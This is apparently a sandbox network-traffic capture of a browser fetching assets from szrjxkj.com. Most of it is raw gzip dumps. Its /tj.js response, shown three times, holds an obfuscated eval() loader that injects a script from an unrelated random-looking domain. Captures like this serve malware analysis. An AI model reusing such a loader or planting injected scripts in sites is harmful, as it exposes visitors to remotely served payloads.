            Mar 13, 2025 10:53:16.169682026 CET1236INData Raw: ad 67 f8 2f 52 48 b8 e7 98 fe 49 68 36 e6 0f d3 00 a3 5b eb 98 05 a2 11 aa 00 af 54 b5 b7 9a 1f aa ab 70 23 e4 42 0e 79 ca da 00 a6 18 54 51 b4 41 e5 b3 00 bc 12 28 a9 ae 9b 8c b3 ce fc ed a1 5e 7d e7 5c b2 34 48 80 7d c2 e5 40 10 e6 fb ef e8 9a
            Data Ascii: g/RHIh6[Tp#ByTQA(^}\4H}@nH-wjpgPKmMP-d0KO|Rp6=>`Wn?[Fys:?'u3c]b*a4aYL-Ou[O}fYI]Mf=Sgg(i3wT\
            Mar 13, 2025 10:53:16.169822931 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:15 GMT
            Content-Type: text/css
            Last-Modified: Wed, 08 Nov 2023 17:36:16 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bc710-1ffb6"
            Expires: Thu, 13 Mar 2025 21:53:15 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 35 30 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 1c b7 91 e0 e7 e3 af a8 a5 c2 e7 a1 96 3d 9a ee 99 e1 3c 36 e4 b0 1e e6 d9 11 6b 9f 4e f2 ee da 61 fb 22 fa 51 33 53 66 4f f7 b8 bb 87 14 b5 e1 fb ed 97 99 c8 04 12 40 a2 1e cd a1 48 5b 23 59 34 bb 0a c8 4a 24 12 89 44 be f0 d9 a7 4f aa 4f ab 9f ed f9 0f f4 c5 ee bf af 6f ef 96 d3 5d 5d fd 6e 7a 5b 5f 56 5f dc dd dd be 6d 96 d5 08 ff 56 fd fb 74 b5 68 56 d7 a1 51 55 61 9f 9b dd ee ee f2 b3 37 6f de 1c ce d6 eb dd 76 b7 99 de dd ce 0e e7 eb 5b 7c f9 9f f5 66 db ac 57 97 d5 f8 f0 88 bf b1 27 86 3f 83 ee 9f 3d f9 ec d3 27 9f ef ff cf 93 0a fe f9 cd ef be fe d5 1f de 09 0a 81 39 1a 3f ab be ad b7 f5 ce fd 9a 3c ab be 58 35 b7 d3 1d 8c 76 eb 1e 1d 3f ab 7e ff f6 6e 7d 0d 04 b9 79 eb 1e 9d 3c ab fe 63 d7 2c 9b 5d 53 6f 9f b8 47 a7 cf aa 2f ef 77 bb f5 ca fd 7c 01 9d 9a dd b2 76 bf ce 9e 55 df 2d 9b 45 bd a9 7e b5 ac 6f eb d5 8e 41 9f 43 ab e9 cc b5 b9 80 36 f5 b2 9e ef 66 eb ef e9 c9 f8 08 40 6e ea e9 62 be b9 bf 75 8d c6 80 ec 37 d3 eb 66 45 f8 [TRUNCATED]
            Data Ascii: 50ea}k=<6kNa"Q3SfO@H[#Y4J$DOOo]]nz[_V_mVthVQUa7ov[|fW'?='9?<X5v?~n}y<c,]SoG/w|vU-E~oAC6f@nbu7fEVW[~/%`G=h|Y 05|k%fVzN/f{nPn8 Lt}k.3@M^7zPO|)\_cj',k[h3#o|\o.O&+hRa\eG7us}}riz^VnGG?'d^vhKlG-g~,O.#Dob^:lfF1[a}?g.j~v;v_},N/tzM(_?<E|z=>\m@&^?}Iw|M5/z)HSXH
            Mar 13, 2025 10:53:16.173314095 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:15 GMT
            Content-Type: text/css
            Last-Modified: Wed, 08 Nov 2023 17:36:16 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bc710-1ffb6"
            Expires: Thu, 13 Mar 2025 21:53:15 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 35 30 65 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d 6b 93 1c b7 91 e0 e7 e3 af a8 a5 c2 e7 a1 96 3d 9a ee 99 e1 3c 36 e4 b0 1e e6 d9 11 6b 9f 4e f2 ee da 61 fb 22 fa 51 33 53 66 4f f7 b8 bb 87 14 b5 e1 fb ed 97 99 c8 04 12 40 a2 1e cd a1 48 5b 23 59 34 bb 0a c8 4a 24 12 89 44 be f0 d9 a7 4f aa 4f ab 9f ed f9 0f f4 c5 ee bf af 6f ef 96 d3 5d 5d fd 6e 7a 5b 5f 56 5f dc dd dd be 6d 96 d5 08 ff 56 fd fb 74 b5 68 56 d7 a1 51 55 61 9f 9b dd ee ee f2 b3 37 6f de 1c ce d6 eb dd 76 b7 99 de dd ce 0e e7 eb 5b 7c f9 9f f5 66 db ac 57 97 d5 f8 f0 88 bf b1 27 86 3f 83 ee 9f 3d f9 ec d3 27 9f ef ff cf 93 0a fe f9 cd ef be fe d5 1f de 09 0a 81 39 1a 3f ab be ad b7 f5 ce fd 9a 3c ab be 58 35 b7 d3 1d 8c 76 eb 1e 1d 3f ab 7e ff f6 6e 7d 0d 04 b9 79 eb 1e 9d 3c ab fe 63 d7 2c 9b 5d 53 6f 9f b8 47 a7 cf aa 2f ef 77 bb f5 ca fd 7c 01 9d 9a dd b2 76 bf ce 9e 55 df 2d 9b 45 bd a9 7e b5 ac 6f eb d5 8e 41 9f 43 ab e9 cc b5 b9 80 36 f5 b2 9e ef 66 eb ef e9 c9 f8 08 40 6e ea e9 62 be b9 bf 75 8d c6 80 ec 37 d3 eb 66 45 f8 [TRUNCATED]
            Data Ascii: 50ea}k=<6kNa"Q3SfO@H[#Y4J$DOOo]]nz[_V_mVthVQUa7ov[|fW'?='9?<X5v?~n}y<c,]SoG/w|vU-E~oAC6f@nbu7fEVW[~/%`G=h|Y 05|k%fVzN/f{nPn8 Lt}k.3@M^7zPO|)\_cj',k[h3#o|\o.O&+hRa\eG7us}}riz^VnGG?'d^vhKlG-g~,O.#Dob^:lfF1[a}?g.j~v;v_},N/tzM(_?<E|z=>\m@&^?}Iw|M5/z)HSXH
            Mar 13, 2025 10:53:17.944293976 CET398OUTGET /skin/images/logo-white.png HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:18.278003931 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: image/png
            Last-Modified: Wed, 08 Nov 2023 16:08:12 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb26c-91f"
            Expires: Sat, 12 Apr 2025 09:53:18 GMT
            Cache-Control: max-age=2592000
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 39 33 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 28 08 d7 f7 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 81 00 00 00 65 08 06 00 00 00 6a 75 80 c4 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 c9 49 44 41 54 78 5e ed 9d 3d 8e dd 36 14 46 a7 30 e0 22 55 b6 60 a4 4a 4a 6f 21 5b f0 16 bc 05 b7 01 d2 78 0b 5e 83 fb 34 a9 d2 bb 76 e7 2a 5d 0a 03 2e 53 d9 e7 93 48 41 3f 97 14 29 51 6f a4 f7 ee 01 88 27 f1 92 94 78 ef 27 8a e4 bc 99 79 7a 44 be 7f ff fe 92 f4 8e f4 85 f4 3f e9 73 38 7f 11 8a 38 f7 0c 81 fe 89 f4 37 c9 e2 2f d2 cb 50 d4 b9 47 08 b0 04 f0 8f a2 0d ff 92 7e 27 69 54 d0 e7 7f 24 e1 42 b8 57 08 ec 5c 00 bf 04 53 07 e7 bf 91 5c 08 f7 0a 01 cd 0a 20 42 be 0b e1 1e 21 90 45 02 88 60 77 21 dc 13 04 b0 4a 00 11 ca b9 10 ee 01 02 b7 49 00 11 ca bb 10 ae 0c 01 db 25 80 08 f5 5c 08 57 84 40 35 11 40 84 fa 2e 84 2b 41 80 9a 0a 20 42 3b 2e 84 2b 40 60 0e 11 40 84 f6 5c 08 67 86 80 1c 2a 80 08 ed ba 10 ce 08 81 b8 89 00 22 b4 ef 42 38 13 04 a0 [TRUNCATED]
            Data Ascii: 93b(PNGIHDRejusRGBgAMAaIDATx^=6F0"U`JJo![x^4v*].SHA?)Qo'x'yzD?s887/PG~'iT$BW\S\ B!E`w!JI%\W@5@.+A B;.+@`@\g*"B8ZyA_I"e\g@ppQ4\Sr.[7O*D{B*u!Y-d2[W58tD_HBkpnz".V&}=!8tgRPT6ka8J9.C8Pj)$PRD&[`w!c@d5PsT>+95h@ylGT6}P%gy$/>tX*}.d;8CLh$KC3NpfB3&AgHn^,}JWU!P6suWsp| +W',pB1tZa 5u&e-Pm hTZobrU]-c!
            Mar 13, 2025 10:53:18.280325890 CET332OUTGET /skin/js/jquery.min.js HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:18.664166927 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: application/javascript
            Last-Modified: Wed, 08 Nov 2023 16:47:06 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bbb8a-14e4a"
            Expires: Thu, 13 Mar 2025 21:53:18 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 38 33 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc bd 69 77 1b d7 95 f7 fb be 3f 05 89 a8 69 40 2c 52 a4 ec e4 76 40 97 b0 3c c6 4e 6c cb 6d c9 71 dc 20 ed 85 a1 00 82 04 01 12 00 45 c9 04 fb b3 df df 7f 9f a1 4e 15 40 39 e9 7e 9e 75 6f ba 2d 16 6a 38 e3 3e 7b 1e 9e 3d dd dd b9 f8 cf db 62 f1 6e e7 cd f3 c3 e7 87 1f ed ac 77 9a 83 56 b8 f7 e5 fc 76 36 ec ad 26 f3 19 f7 2f 6e f4 de e1 7c 31 7e 36 9d 0c 8a d9 b2 d8 79 fa ec df 76 47 b7 b3 81 de 68 f6 b2 7e eb be 31 ef 5f 14 83 55 23 cf 57 ef ae 8b f9 68 e7 6a 3e bc 9d 16 7b 7b 8f 3c 38 2c de 5e cf 17 ab 65 c7 bd 17 7e e6 bd c3 e1 7c 70 7b 55 cc 56 9d 3e 2d ef 1e b5 da 65 47 ad fb c9 a8 b9 5b be d2 5a 9d 2f e6 77 3b b3 e2 6e e7 8b c5 62 be 68 36 fc 9c 16 c5 cd ed 64 51 2c 77 7a 3b 77 93 d9 90 77 ee 26 ab 73 7e 85 c6 1b ad 93 45 b1 ba 5d cc 76 e8 a5 f5 d0 b6 7f 9b 0d 66 5d 8c 26 b3 62 d8 d8 0d f3 70 df 77 dc 9f f6 ea 7c b2 cc aa 33 7f d3 5b ec 0c f2 ee 59 36 4c 06 9f 15 f9 e0 70 a9 e5 ca 46 5c 0d e6 b3 41 6f 95 8d b9 bc be 5d 9e 67 e7 5c 30 ae e2 ed cb [TRUNCATED]
            Data Ascii: 832aiw?i@,Rv@<Nlmq EN@9~uo-j8>{=bnwVv6&/n|1~6yvGh~1_U#Whj>{{<8,^e~|p{UV>-eG[Z/w;nbh6dQ,wz;ww&s~E]vf]&bpw|3[Y6LpF\Ao]g\0Q6|rZ-&qvXeSt7l,E1;h{}y_/k<gvp<xa$[lfxEpb{9/Wjhe1Tl4i1Gjb{Wv8U"o9zno_]gqY6743b1._m`@JaG_g78:C=~hm]o{dxkQ~6s-Avow}=}a\dL?ve7#17[;l~(um^=S^[s}}q39llZIqZ>8^XzA>9RHh?O


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            4192.168.2.44973438.174.150.133801004C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            Mar 13, 2025 10:53:14.516238928 CET316OUTGET /tj.js HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: */*
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:16.169444084 CET720INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:15 GMT
            Content-Type: application/javascript
            Content-Length: 361
            Last-Modified: Wed, 11 Dec 2024 03:44:33 GMT
            Connection: keep-alive
            ETag: "67590aa1-169"
            Expires: Thu, 13 Mar 2025 21:53:15 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Accept-Ranges: bytes
            Data Raw: 3b 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c 65 2c 72 29 7b 65 3d 53 74 72 69 6e 67 3b 69 66 28 21 27 27 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 72 5b 63 5d 3d 6b 5b 63 5d 7c 7c 63 3b 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 5b 65 5d 7d 5d 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 27 5c 5c 77 2b 27 7d 3b 63 3d 31 7d 3b 77 68 69 6c 65 28 63 2d 2d 29 69 66 28 6b 5b 63 5d 29 70 3d 70 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 27 5c 5c 62 27 2b 65 28 63 29 2b 27 5c 5c 62 27 2c 27 67 27 29 2c 6b 5b 63 5d 29 3b 72 65 74 75 72 6e 20 70 7d 28 27 31 2e 32 28 22 3c 30 20 33 3d 5c 5c 22 34 3a 2f 2f 35 2e 36 2e 37 2f 38 2e 39 5c 5c 22 3e 3c 2f 30 3e 22 29 3b 27 2c 31 30 2c 31 30 2c 27 73 63 72 69 70 74 7c 64 6f 63 75 6d 65 6e 74 7c 77 72 69 74 65 6c 6e 7c 73 72 63 7c 68 74 74 70 73 7c 6f 75 64 6e 67 6d 73 6c 68 69 66 6e 73 66 7c 67 64 6d 67 63 79 79 7c 63 6f 6d 7c 74 6a [TRUNCATED]
            Data Ascii: ;eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2("<0 3=\\"4://5.6.7/8.9\\"></0>");',10,10,'script|document|writeln|src|https|oudngmslhifnsf|gdmgcyy|com|tj|js'.split('|'),0,{}));
            Mar 13, 2025 10:53:16.169784069 CET720INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:15 GMT
            Content-Type: application/javascript
            Content-Length: 361
            Last-Modified: Wed, 11 Dec 2024 03:44:33 GMT
            Connection: keep-alive
            ETag: "67590aa1-169"
            Expires: Thu, 13 Mar 2025 21:53:15 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Accept-Ranges: bytes
            Data Raw: 3b 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c 65 2c 72 29 7b 65 3d 53 74 72 69 6e 67 3b 69 66 28 21 27 27 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 72 5b 63 5d 3d 6b 5b 63 5d 7c 7c 63 3b 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 5b 65 5d 7d 5d 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 27 5c 5c 77 2b 27 7d 3b 63 3d 31 7d 3b 77 68 69 6c 65 28 63 2d 2d 29 69 66 28 6b 5b 63 5d 29 70 3d 70 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 27 5c 5c 62 27 2b 65 28 63 29 2b 27 5c 5c 62 27 2c 27 67 27 29 2c 6b 5b 63 5d 29 3b 72 65 74 75 72 6e 20 70 7d 28 27 31 2e 32 28 22 3c 30 20 33 3d 5c 5c 22 34 3a 2f 2f 35 2e 36 2e 37 2f 38 2e 39 5c 5c 22 3e 3c 2f 30 3e 22 29 3b 27 2c 31 30 2c 31 30 2c 27 73 63 72 69 70 74 7c 64 6f 63 75 6d 65 6e 74 7c 77 72 69 74 65 6c 6e 7c 73 72 63 7c 68 74 74 70 73 7c 6f 75 64 6e 67 6d 73 6c 68 69 66 6e 73 66 7c 67 64 6d 67 63 79 79 7c 63 6f 6d 7c 74 6a [TRUNCATED]
            Data Ascii: ;eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2("<0 3=\\"4://5.6.7/8.9\\"></0>");',10,10,'script|document|writeln|src|https|oudngmslhifnsf|gdmgcyy|com|tj|js'.split('|'),0,{}));
            Mar 13, 2025 10:53:16.170021057 CET720INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:15 GMT
            Content-Type: application/javascript
            Content-Length: 361
            Last-Modified: Wed, 11 Dec 2024 03:44:33 GMT
            Connection: keep-alive
            ETag: "67590aa1-169"
            Expires: Thu, 13 Mar 2025 21:53:15 GMT
            Cache-Control: max-age=43200
            Strict-Transport-Security: max-age=31536000
            Accept-Ranges: bytes
            Data Raw: 3b 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 70 2c 61 2c 63 2c 6b 2c 65 2c 72 29 7b 65 3d 53 74 72 69 6e 67 3b 69 66 28 21 27 27 2e 72 65 70 6c 61 63 65 28 2f 5e 2f 2c 53 74 72 69 6e 67 29 29 7b 77 68 69 6c 65 28 63 2d 2d 29 72 5b 63 5d 3d 6b 5b 63 5d 7c 7c 63 3b 6b 3d 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 5b 65 5d 7d 5d 3b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 27 5c 5c 77 2b 27 7d 3b 63 3d 31 7d 3b 77 68 69 6c 65 28 63 2d 2d 29 69 66 28 6b 5b 63 5d 29 70 3d 70 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 27 5c 5c 62 27 2b 65 28 63 29 2b 27 5c 5c 62 27 2c 27 67 27 29 2c 6b 5b 63 5d 29 3b 72 65 74 75 72 6e 20 70 7d 28 27 31 2e 32 28 22 3c 30 20 33 3d 5c 5c 22 34 3a 2f 2f 35 2e 36 2e 37 2f 38 2e 39 5c 5c 22 3e 3c 2f 30 3e 22 29 3b 27 2c 31 30 2c 31 30 2c 27 73 63 72 69 70 74 7c 64 6f 63 75 6d 65 6e 74 7c 77 72 69 74 65 6c 6e 7c 73 72 63 7c 68 74 74 70 73 7c 6f 75 64 6e 67 6d 73 6c 68 69 66 6e 73 66 7c 67 64 6d 67 63 79 79 7c 63 6f 6d 7c 74 6a [TRUNCATED]
            Data Ascii: ;eval(function(p,a,c,k,e,r){e=String;if(!''.replace(/^/,String)){while(c--)r[c]=k[c]||c;k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('1.2("<0 3=\\"4://5.6.7/8.9\\"></0>");',10,10,'script|document|writeln|src|https|oudngmslhifnsf|gdmgcyy|com|tj|js'.split('|'),0,{}));
            Mar 13, 2025 10:53:17.944355965 CET404OUTGET /skin/images/download-bgshape.png HTTP/1.1
            Host: szrjxkj.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
            Referer: http://szrjxkj.com/dongtai/8622.html
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en;q=0.9
            Mar 13, 2025 10:53:18.287796021 CET1236INHTTP/1.1 200 OK
            Server: nginx
            Date: Thu, 13 Mar 2025 09:53:18 GMT
            Content-Type: image/png
            Last-Modified: Wed, 08 Nov 2023 16:08:10 GMT
            Transfer-Encoding: chunked
            Connection: keep-alive
            Vary: Accept-Encoding
            ETag: W/"654bb26a-8aec"
            Expires: Sat, 12 Apr 2025 09:53:18 GMT
            Cache-Control: max-age=2592000
            Strict-Transport-Security: max-age=31536000
            Content-Encoding: gzip
            Data Raw: 34 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 5b 79 3c d4 eb f7 4f 42 b9 51 c2 cd ee 57 6e 25 2a b2 ef 5a 30 ae 4a 91 31 f6 25 31 b2 17 1a db 8c 2d 29 59 ae 5b c8 3a 65 12 66 98 49 f6 6d ec 74 6d 63 aa 31 b2 8d a5 31 32 98 61 98 19 c6 f2 fb e8 fb 87 97 97 31 9f e7 39 e7 39 ef 73 9e 73 de e7 7c 5e de b3 06 89 08 cb 08 1f 3a 74 48 e4 6f 4b 33 db 43 87 0e db 01 3f 72 47 05 81 4f d4 5f ab 2b 03 bf f8 42 6d 41 37 0e 61 87 e5 7e 01 7f 1c 81 5e bf 73 fd d0 a1 aa 8c 3f 76 3c 05 0e 1d 4a c9 fe db ec ba 5d 84 db 4a 6b 73 9d 52 eb bf 1f 7e 74 5a 9e 7b 63 6b f5 87 52 8d 3a 63 3f c5 d8 b3 e2 d3 a5 5b b7 60 87 1e 9f d1 fd 2f b0 6e b4 5e 2e c4 e5 b0 d8 c3 43 6c 4d d6 cf 2d 77 1b 09 73 9b ef bf f6 f7 28 fb bc fd e5 1d 50 47 ec 9f ff b7 2f 55 7d 57 cc fc e0 1f 1b d1 66 4a 35 7c 5e 1b ee b2 fb d1 f3 fb 47 f7 29 67 97 f7 f7 83 3c 44 07 37 fb 02 56 72 5e 15 2b a7 14 2b 6f 07 74 8c 2d 97 45 26 f0 2d a5 8a df f9 37 ef 1c 1b 39 cb 9a 71 ba 0a 39 78 5e 02 fe f1 a9 d2 4d d6 07 8b 64 9f d2 44 c1 25 e1 82 5b b8 e4 da f6 [TRUNCATED]
            Data Ascii: 4000$[y<OBQWn%*Z0J1%1-)Y[:efImtmc112a199ss|^:tHoK3C?rGO_+BmA7a~^s?v<J]JksR~tZ{ckR:c?[`/n^.ClM-ws(PG/U}WfJ5|^G)g<D7Vr^++ot-E&-79q9x^MdD%[=.[(f=.5jd.2~?nnz";K]"BiB08\ahgxqr\?/fQ57H,WyRHRx0?g%"&rE6sopCvfk9oS%7b\?yWRiFLqm"pQeM;fQ4Z^V~v`2o.H]o4m4Z6oXHzb]XR+8F$}16TvF(Y)QT8t"+YCF-2~df43yAeIP-n]UUu%c]Z/u2QX~dR -hHtfrlRegJGm-k#
            Mar 13, 2025 10:53:18.287808895 CET1236INData Raw: 39 75 88 12 c9 5c e6 7c b6 76 69 a0 fa 51 ca a1 21 eb a4 fc 62 8c 87 b5 51 f3 5b f4 6f dc 1d 09 4c 7e ca 21 28 28 e7 dd 74 14 11 1f 48 59 98 8a 71 49 7a 3e 5f 78 4f b3 e6 70 aa 6a d9 f8 d1 85 1e d6 80 e2 fe ef cd 0d 1f 19 16 78 16 71 6f bd d9 97
            Data Ascii: 9u\|viQ!bQ[oL~!((tHYqIz>_xOpjxqoK,o\+sX&^=f-7T'EgEF<~Rb:i[XHBTMp9}--TPvIj:N#]Ez5Gu/K,<@d]R}kQ`O?}5}yu?|
            Mar 13, 2025 10:53:18.287820101 CET448INData Raw: 1a 3f 71 41 2e 48 d5 c2 ea 04 28 9b 30 93 ac fd a0 2f a5 ea ba 62 71 78 76 f3 58 ad 18 ce 94 1f 7e 85 a4 59 be 2e 53 88 46 da 52 8f d2 16 7b a7 e2 63 4b 37 9a 3f 90 e7 69 fc 5d a4 78 c6 2a 72 7d 2f 2b fd c0 c3 c9 8f 4c 53 43 42 88 96 44 b3 b4 54
            Data Ascii: ?qA.H(0/bqxvX~Y.SFR{cK7?i]x*r}/+LSCBDTf^{Mo+RU+R_[Z~f[@YxG!RDA/|BgUQxWU1LEk-'Vehw(wgJOL[X]*v{"
            Mar 13, 2025 10:53:18.289999962 CET1236INData Raw: a9 c4 67 69 11 67 03 fa d5 3b db fe 7d 31 c2 f0 41 0e a6 ac b7 e2 bb a3 db 7f 8f 10 dd 56 48 49 34 f4 bf c9 1f 04 1a 89 b9 b5 96 eb 7b 44 eb 56 5c 38 01 23 86 7e 92 33 63 c8 8a 88 34 cb c3 8c a3 00 a9 d4 48 88 6b 33 9f 8a 23 9f d8 0f 49 9c b8 79
            Data Ascii: gig;}1AVHI4{DV\8#~3c4Hk3#Iydouh /EMuGf^oMF]|%ehkbLo>QN?{UUq(ML+R?Whq/|4xW>A<0BWR_l\"8s
            Mar 13, 2025 10:53:18.290009975 CET1236INData Raw: 0c af 39 da ff 7f 5e 52 36 52 e7 f9 60 3e f9 3a 7a cf f8 a2 b6 85 2b e2 99 62 0a a4 dd f3 cb 22 15 1a 0f bd 9f 05 6a 54 df 0b e0 46 9e 5a a8 b9 c3 f3 73 49 42 be ea ad 6e 6f 88 88 94 70 1f de 53 a0 9c 3a 73 19 b2 ce 46 c7 ea 52 02 56 81 93 cd 10
            Data Ascii: 9^R6R`>:z+b"jTFZsIBnopS:sFRV{FPQtaz%"zEd5ICazSd02ZdVnL`hyn}wXH8\dpPNj<>m[,[cWR j[#Y
            Mar 13, 2025 10:53:18.290019989 CET448INData Raw: 74 89 92 57 fa 30 63 b7 16 e1 53 09 d4 7a 2f 98 09 c1 ed 2f 16 d5 6c b3 b6 f8 16 4b bd 4b 96 ee cf 7a d5 58 03 8e 77 0a 47 58 57 9d 61 a2 fb c1 c3 13 18 83 50 b7 d1 b2 30 78 d3 97 cf a3 85 e8 34 af 98 65 ab 48 01 36 d9 b2 66 3a 4b 9b 16 e1 3e e4
            Data Ascii: tW0cSz//lKKzXwGXWaP0x4eH6f:K>7^Hk#.MZMB4*@x6\zX0k,zz+lk"|:0X-8@EUn'bDi^C{pj3 u5kcGl?\1Gp
            Mar 13, 2025 10:53:18.292963982 CET1236INData Raw: 32 3d cb 27 e4 c0 58 bf 14 cd 73 0c 29 1b ea 77 02 fd 05 14 67 36 ce 60 8e 5c 3f 58 b1 ee aa 81 6b db 15 6c b6 64 e1 4d fd f1 8f 8d 7e c7 27 5a 96 89 a1 79 1c b9 01 27 72 84 a4 d4 71 8b cb b0 35 ff 31 4e ae f3 d9 b0 0f 04 31 b0 97 91 6e 53 6f 26
            Data Ascii: 2='Xs)wg6`\?XkldM~'Zy'rq51N1nSo&@D"Wx%d0{*qt4=*3?QT"MP-Z8o"jf^LGmpP{Ykv*sMh=o$ 6f]%u!Mdo^JNu4
            Mar 13, 2025 10:53:18.292994022 CET1236INData Raw: 45 1c 36 ee 01 b0 85 06 da 48 17 83 a9 09 fc 9e b1 b4 8d 4b 4d 2b fe f2 ec 34 94 ff bc 37 1b 23 f1 ee 3f 47 01 8b 24 20 78 4b a2 23 ed 3b f8 74 54 94 4c c4 e5 9e 80 d3 b7 94 1e 97 00 79 c8 f9 3c e7 34 57 c7 50 c9 ea 48 09 c6 44 cf 15 dd 7e 55 92
            Data Ascii: E6HKM+47#?G$ xK#;tTLy<4WPHD~UrwU'{%p1!5>&vG4CLQM'[w#sEh,}Wo8m2<_~_C^eDCo8=lrY<br#OCG6[iW/h7({HP
            Mar 13, 2025 10:53:18.296071053 CET448INData Raw: 9f 2f 5c 98 dd 7b cd 35 16 fb aa 01 a6 16 2f fa d7 c0 3b aa ca 3b 9f a5 a6 4a 34 0c dc 2e 34 07 42 89 67 7e ba 92 de 11 d0 e3 92 8a b5 4b 90 3e 77 3e e4 e6 a5 d2 4d ec a0 01 b1 89 dd aa f4 d4 b7 99 23 5f 0b 0e 83 a7 0f b3 d2 db 6b 52 d7 55 d7 1e
            Data Ascii: /\{5/;;J4.4Bg~K>w>M#_kRU-G;_HXv/5mP$g}q4x*6BfNUVhWUC'Ba*i4SIY=-l%y3f`%AxT'opVRQ/)e>0\
